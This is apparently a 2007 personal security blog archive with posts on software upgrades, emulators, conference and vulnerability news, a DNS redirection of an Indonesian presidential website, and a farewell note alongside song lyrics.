Goodbye IT World !

Today, I am going to leave the IT world and entering another field.

Many great things has come to me in the IT world, I also enjoy great relationship with many friends during my days in the IT world. But things change, I am going to pursue another things outside the IT world.

I will be entering "silent" mode in blogging. You may not see new blog from me. I will try my best to write a blog entry whenever I can.

I wish you all the best of luck and have a great life.

When You Believe

Many nights we've prayed
With no proof anyone could hear
In our hearts a hopeful song
We barely understood

Now we are not afraid
Although we know there's much to fear
We were moving mountains long
Before we knew we could

There can be miracles, when you believe
Though hope is frail, it's hard to kill
Who knows what miracles you can achieve
When you believe, somehow you will
You will when you believe

In this time of fear
When prayers so often prove in vain
Hope seems like the summer birds
So swiftly flown away

Yet now I'm standing here
My heart's so full I can't explain
Seeking faith and speaking words
I never thought I'd say

There can be miracles, when you believe
Though hope is frail, it's hard to kill
Who knows what miracles you can achieve
When you believe, somehow you will
You will when you believe

They don't always happen when you ask
(Oh)
And it's easy to give in to your fears
(Oh...Ohhhh)
But when you're blinded by your pain
Can't see your way straight throught the rain
Small but still, resilient voice
Says love is very near
(Ohhh)

There can be miracles
(Miracles)
When you believe
(Lord, when you believe)
Though hope is frail
(Though hope is frail)
It's hard to kill
(Hard to kill, Ohhh)
Who know what miracles,you can achieve
When you believe,somehow you will(somehow,somehow)
somehow you will
You will when you believe

You will when you believe
You will when you believe
Just believe...just believe
You will when you believe

Source : Whey You Believe - Mariah Carey & Whitney Houston

I Will Win, I Will Lose

In the dreams I dreamed as a child
I lived my life as a king
My days were filled with sunshine
And there was never any pains

I will win, I will lose
I will live my life
I will have to make my way on my own
I will win, I will lose
I will create my own path
I will play the game of life

I've had brief moments of joy
Endless moments of boredom
I've had days full of sunshine
I know what pain is...

I will win, I will lose
I will live my life
I will know how to continue on my own
I will win, I will lose
Now I know my path
But I'll play the game of life on my own

A king, I will certainly not be
And yet, I'll live...

I will win, I will lose
I will have light and shadow
But alone I'll have to go on
I will win, I will lose
My life will be
like a long journey to make

I will win, I will lose
I will live my life
I will have to make my way on my own
I will win, I will lose
Now I know my path...
I will win, I will lose
I will play the game...
I will win, I will lose
But alone...

from :
MARIO FRANGOULIS
Vincerò, Perderò
Lyrics: Luisa Zappa Branduardi
Music: Steve Wood

Upgrading TrueCrypt

On March 19, 2007, TrueCrypt version 4.3 is released. There are many new features, improvements and bug fixes in this release, so I think it is the time to upgrade my installation.

I downloaded the TrueCrypt package, but they only provide for OpenSUSE 10.2 system. Last time I used the RPM version, it complained about kernel mismatch. But this time it didn't complain.

Unfortunately, I already have TrueCrypt installed from source package. So I need to remove that first before I install the newer version. To make matter worse, the TrueCrypt package doesn't come with uninstaller, I need to read the installer script and reverse the installation process to create an uninstallation script. This uninstalation script is very simple : it will remove three files that have been installed by the installation script.

Without further talk, you can download the uninstaller script here.

To remove your previous TrueCrypt that you compile yourself, just type the following command :

# ./remove-truecrypt.sh

And you're done.

Computer Virtualization in Java

Researchers at Oxford have built an x86 emulator that runs purely on Java, making it ideal for security researchers who want to analyze and archive viruses, host honeypots and defend themselves against buggy or malicious software without hosing their machines. The JPC also emulates a host of other environments, giving technophiles the ability to play Asteroids and other software that's sat on shelves for years collecting dust.

Here are several key features of JPC :

• Cross-Platform

JPC is completely implemented in Java, so it works seamlessly across all major computing platforms, including Windows, Linux and MacOS. JPC even works on non-x86 based hardware like ARM and SPARC.

• Secure

JPC comes with the assured security of being run entirely within the Java sandbox. This means that the emulated hardware is completely isolated from the underlying hardware and cannot damage or interfere with it in any way.

• Flexible

With JPC, you have complete configuration control with virtual peripherals and software libraries. And if you mess up, you only mess up your virtual PC. Just delete your disk images and start again.

Situs Presiden SBY "Dibobol" ?

Saya mengetahui informasi tentang "dibobolnya" situs Presiden SBY melalui sebuah televisi swasta pada hari Sabtu, 17 Maret 2007. Informasi tersebut saya peroleh dari newsline yang berjalan, dengan judul "Situs Presiden SBY di-hack". Detik telah pula menurunkan berita ini dengan judul "Situs Presiden SBY Dibobol".

Kemudian saya bertanya kepada beberapa orang rekan mengenai kebenaran berita ini, dan mereka menyatakan kebenarannya, namun mereka menjelaskan pula bahwa yang dibobol bukanlah server yang berisikan situs Presiden SBY tersebut, melainkan si penyerang berhasil masuk ke manajemen server untuk melakukan perubahan informasi alamat IP situs Presiden SBY sehingga ketika kita mengakses situs tersebut, kita dialihkan ke situs lain.

Sebagai contoh, misalkan saja alamat IP situs Presiden SBY (www.presidensby.info) yang seharusnya adalah 111.222.111.222, tapi dialihkan oleh penyerang ke alamat IP 222.111.222.111. Sehingga bila kita mengakses site tersebut dengan menggunakan alamat www.presidensby.info kita akan diarahkan ke alamat 222.111.222.111 dan bukannya ke alamat 111.222.111.222.

Kepastian ini telah pula dikonfirmasi oleh koordinator pengelola situs Presiden, Anjar Ari Nugroho, di berita Detik "Situs SBY Bobol Bukan Karena Masalah di Server".

Berikut ini adalah beberapa kesimpulan yang dapat saya kemukakan (bisa saja salah karena saya tidak tahu arsitektur keamanan situs Presiden SBY dan juga berita lengkap kejadian ini) :

• server web yang menangani situs Presiden SBY TIDAK DIBOBOL
  
• server DNS yang menangani situs www.presidensby.info juga TIDAK DIBOBOL
  
• pelaku melakukan perubahan informasi alamat IP situs www.presidensby.info untuk dialihkan ke alamat lain yang telah ia setup sebelumnya.
  

Menurut saya pelaku tindakan ini tampaknya memiliki pengetahuan yang baik, sehingga ia dapat mengetahui sisi lemah dari situs tersebut.

Kejadian ini mengingatkan saya pada slogan dalam dunia IT security : security is as strong as the weakest link, keamanan sebuah sistem hanya sekuat rantai yang terlemah.

Intrusion Detection RFCs

There are now three RFCs regarding Intrusion Detection :

• RFC 4765: The Intrusion Detection Message Exchange Format (IDMEF)


• RFC 4766: Intrusion Detection Message Exchange Requirements


• RFC 4767: The Intrusion Detection Exchange Protocol (IDXP)

Upgrading to PHP 5.2.x

I have been planning to upgrade my PHP to version 5.2.1 since several weeks ago, but I couldn't find spare time to do that until last night.

I upgraded the following packages (libedit is a new install) :

# rpm -Uvh php5-5.2.1-15.1.i586.rpm apache2-mod_php5-5.2.1-15.1.i586.rpm php5-gd-5.2.1-15.1.i586.rpm php5-mysql-5.2.1-15.1.i586.rpm php5-zlib-5.2.1-15.1.i586.rpm php5-pdo-5.2.1-15.2.i586.rpm php5-fastcgi-5.2.1-15.2.i586.rpm libedit-2.10.snap20061228-6.1.i586.rpm

After successfully upgraded those packages, I started my Apache webserver :
# rcapache2 start

Then I launched my browser and access the test file (index.php). The content only contains phpinfo() function.

Unfortunately, I can only see blank page.

I checked the error log and access log, but I can't find the error messages.

Next I check the PHP configuration (/etc/php5/apache/php.ini).

After looking through the configuration file around 11%, I found out what is the cause of this error. It looks like the new configuration turn-off the short_open_tag.

There are two things that I can do to fix this :

- I can turn on the short_open_tag config by setting :

short_open_tag = On

or

- I can change my PHP code to use the recommended open tag ("
After edited my PHP code, I restarted Apache server :

# rcapache2 restart

And now here is my PHP test page :


BTW, I just knew that this version is come with Suhosin. Yihaaa.

Paper : Case of Mistaken Identity

A University of Washington researchers Kris Erickson and Philip Howard have an interesting new paper out, "A Case of Mistaken Identity? News Accounts of Hacker and Organizational Responsibility for Compromised Digital Records, 1980–2006." This is a great survey of the dramatic explosion in reports of breaches. A couple of great quotes:

One important outcome of the legislation is improved information about the types of security breaches. Many of the news stories between 1984 and 2004 report palty details, with sources being off the record and vague estimates of the severity of the security breach. Since mandatory reporting legislation in many states, most news coverage provides more substantive details. In 2006, only 10 of the 257 news stories were unable to make some attribution of responsibility for a security breach. (Emphasis added.)

Running A Linux System on A Windows Machine

If you want to run a Linux system on Windows platform but you don't want to deal with partitioning and formatting the harddisk, fortunately you can do so with QEMU.

Here is an official information about QEMU :

QEMU is a generic and open source machine emulator and virtualizer.

When used as a machine emulator, QEMU can run OSes and programs made for one machine (e.g. an ARM board) on a different machine (e.g. your own PC). By using dynamic translation, it achieves very good performances.

When used as a virtualizer, QEMU achieves near native performances by executing the guest code directly on the host CPU. A host driver called the QEMU accelerator (also known as KQEMU) is needed in this case. The virtualizer mode requires that both the host and guest machine use x86 compatible processors.

Interested ?

If yes, just download the QEMU package for Windows. As of today, the latest version is 0.9.0.

After successfully download the package, just extract it to a drive (C, D, or whatever you like) and it will create a folder automatically.

Next you need a Linux system in ISO format. The above package already included a small Linux system. To test it just run qemu-win.bat in command line. I leave the procedure for this as an exercise for the reader. :D

In this blog, I am going to use Network Security Toolkit ISO image in QEMU. You can use other Linux system if you want.

Here is the step to boot to NST ISO from QEMU :

• Store the Linux image file in the same folder as QEMU. This is only for ease of use. :D
  

• Edit the qemu-win.bat file to the following :

• Run the qemu-win.bat file by typing :

qemu-win

• It will then display the following :

We've managed to run a Linux system on Windows.

Happy QEMU-ing.

BlackHat DC 2007 Presentations

Presentations and whitepapers of BlackHat DC 2007 are now available.

You can find them here.

Don't forget to download several presentations that have made news lately :

- Practical 10 Minute Security Audit: The Oracle Case
- Data Seepage: How to Give Attackers a Roadmap to Your Network
- Beyond The CPU: Defeating Hardware Based RAM Acquisition Tools (Part I: AMD case)
- Danger From Below: The Untold Tale of Database Communication Protocol Vulnerabilities

Pictures from Information Security Awareness Day 2007

I've uploaded several pictures taken by Pak Marsel during the Information Security Awareness Day (March 7, 2007) at BPPT building.

You can view the pictures here.

Enjoy the view.

Hardware-based rootkit detection proven unreliable

From ZDNet :

For years, we've been convinced by companies like Komoku and BBN Technologies that hardware-based RAM acquisition is the most reliable and secure way to sniff out the presence of a sophisticated rootkit on a compromised machine.

Joanna Rutkowska, a security researcher at COSEINC Malware Labs, an elite hacker who specializes in offensive rootkit research, has found several ways to manipulate the results given to hardware-based solutions (PCI cards or FireWire bus).

At this year's Black Hat DC conference, Rutkowska demonstrated three different attacks against AMD64 based systems, showing how the image of volatile memory (RAM) can be made different from the real contents of the physical memory as seen by the CPU.

You can find out more about this from Rukowska's presentation slide.

Experiment Computer Networking using Netkit

Yesterday, a friend of mine, under the name of "Olyx", inform me about a cool networking tool called Netkit. At that time, he didn't give much information about it. He just gave me the information about Netkit.

After arrive home from a meeting, I read the Netkit introduction document. Finally, I figured-out that Netkit is a tool to create computer networking environment. Netkit is using User Mode Linux.

With Netkit we can setup and experiment with routers, switches, computers, etc. We can create a computer networking lab at low-cost and little effort. There is no more reason that you can't learn computer networking because of the price.

If you are interested in Netkit, just donwload the followings :
- Introduction slide
- Tutorial slide
- Netkit packages :

• Core (1 MB)
  
• Filesystems (116 MB)
• Kernel (3 MB)
  

- Basic Topics slides (single host, two hosts, static routing)
- Application Level Topics slides (DNS and Email)

Vista Research Papers

Symantec has released the first three of six technical research papers evaluating Windows Vista security components.

The research papers cover a range of Vista security mechanisms in-depth, from its Address Space Layout Randomization (ASLR) technology designed to thwart heap overflows and certain malware attack methods, to buffer overflow protection in Vista's Visual Studio C++ compiler and an evaluation of how well legacy malware works on Vista's OS.

The first paper is designed for technical managers and other IT professionals who want to understand the effectiveness of Windows Vista’s new security technologies. This paper will be valuable to decision makers who need to get a practical understanding of Windows Vista’s true security posture.

Threats from Within

From DarkReading :

Enterprises are leaking an increasing amount of data from the inside, and they aren't sure what to do about it.

Those are the conclusions of two new studies -- one from the Ponemon Institute and one from Enterprise Strategy Group -- being published today. Both of the reports suggest that enterprises should be shifting their security attention from the outside to the inside.

The new Enterprise Strategy Group report found that one third of the enterprises surveyed had experienced a loss of sensitive data in the last 12 months, while another 11 percent were unsure whether a breach occurred.

According to the new Ponemon study, nearly 60 percent of U.S.-based businesses and government agencies believe they are unable to effectively assess or quantify insider threat risks within their organizations, leaving them open to privacy breaches, failed audits, and potential fraud or misuse of data.

Ferret : A Data Seepage Tool

David Maynor from Errata Security has just released a tool called Ferret for data seepage at BlackHat DC 2007.

According to the Ferret's page, data seepage are bits of benign data that people willingly broadcast to the world (as opposed to "leakage", which is data people want to hide from the world).

Examples of data seepage is what happens when you power-on your computer. It will broadcast to the world a list the list of WiFi access-points you've got cached on your computer, the previous IP address you used (requested by DHCP), your NetBIOS name, your login ID, and a list of servers (via NetBIOS request) you want connections to.

You can get Ferret here.

MOPB Has Begun

Starting from March 1, 2007, the Month of PHP Bugs has begun. Here is an excerpt about this project :

This initiative is an effort to improve the security of PHP. However we will not concentrate on problems in the PHP language that might result in insecure PHP applications, but on security vulnerabilities in the PHP core. During March 2007 old and new security vulnerabilities in the Zend Engine, the PHP core and the PHP extensions will be disclosed on a day by day basis. We will also point out necessary changes in the current vulnerability managment process used by the PHP Security Response Team.

As of today, they have released five bugs :

• PHP 4 Userland ZVAL Reference Counter Overflow Vulnerability

In PHP 4 userland code is able to overflow the internal 16bit zval reference counter by creating many references to a variable. This leads to an exploitable double dtor condition.

• PHP Executor Deep Recursion Stack Overflow

A deep recursion of PHP userland code will exhaust all available stack which leads to a sometimes remotely triggerable crash.

• PHP Variable Destructor Deep Recursion Stack Overflow

The destruction of deeply nested PHP arrays will exhaust all available stack which leads to remotely triggerable crashes.

• PHP 4 unserialize() ZVAL Reference Counter Overflow

During unserialisation of user supplied data that contains a lot of references to a variable the internal 16bit zval reference counter can overflow. This leads to an exploitable double dtor condition.

• PHP unserialize() 64 bit Array Creation Denial of Service Vulnerability

Deserialisation of malformed PHP arrays from within unserialize() might result in a tight endless loop exhausting CPU ressources on 64bit systems.

Kind readers, please fasten your seatbelt during this month, especially if you are using PHP.

Learning Security using DamnVulnerableLinux

If you want to learn security by doing the actual "hacking", there is a good news for you.

Thorsten Schneider of the International Institute for Training, Assessment, and Certification (IITAC) and Secure Software Engineering (S²e) in cooperation with Kryshaam from the French Reverse Engineering Team has released Damn Vulnerable Linux (DVL).

Here is the description about DVL :

Damn Vulnerable Linux (DVL) is everything a good Linux distribution isn't. Its developers have spent hours stuffing it with broken, ill-configured, outdated, and exploitable software that makes it vulnerable to attacks. DVL isn't built to run on your desktop -- it's a learning tool for security students.

DVL is a live CD available as a 150MB ISO. It's based on the popular mini-Linux distribution Damn Small Linux (DSL), not only for its minimal size, but also for the fact that DSL uses a 2.4 kernel, which makes it easier to offer vulnerable elements that might not work under the 2.6 kernel. It contains older, easily breakable versions of Apache, MySQL, PHP, and FTP and SSH daemons, as well as several tools available to help you compile, debug, and break applications running on these services, including GCC, GDB, NASM, strace, ELF Shell, DDD, LDasm, LIDa, and more.

You will also get the video tutorials about DVL overview and the first lesson on buffer overflow. But you have to download them because they don't come with the distro.

At this moment the site can't be accessed, it seems that their system experiences technical problems.

I am looking forward for their next releases that will include so many wonderful tools such as Metasploit and of course more tutorials would be great.

Tool to Steal Browser History

pdp has designed a new tool to steal browser history, it's called Noscript HScan. The interesting thing about this tool is it doesn't need Javascript to be turn-on.

Up until now we thought that by disabling Javascript, we'll be safe. But apparently, that's no longer sufficient, now we need to disable CSS too. :D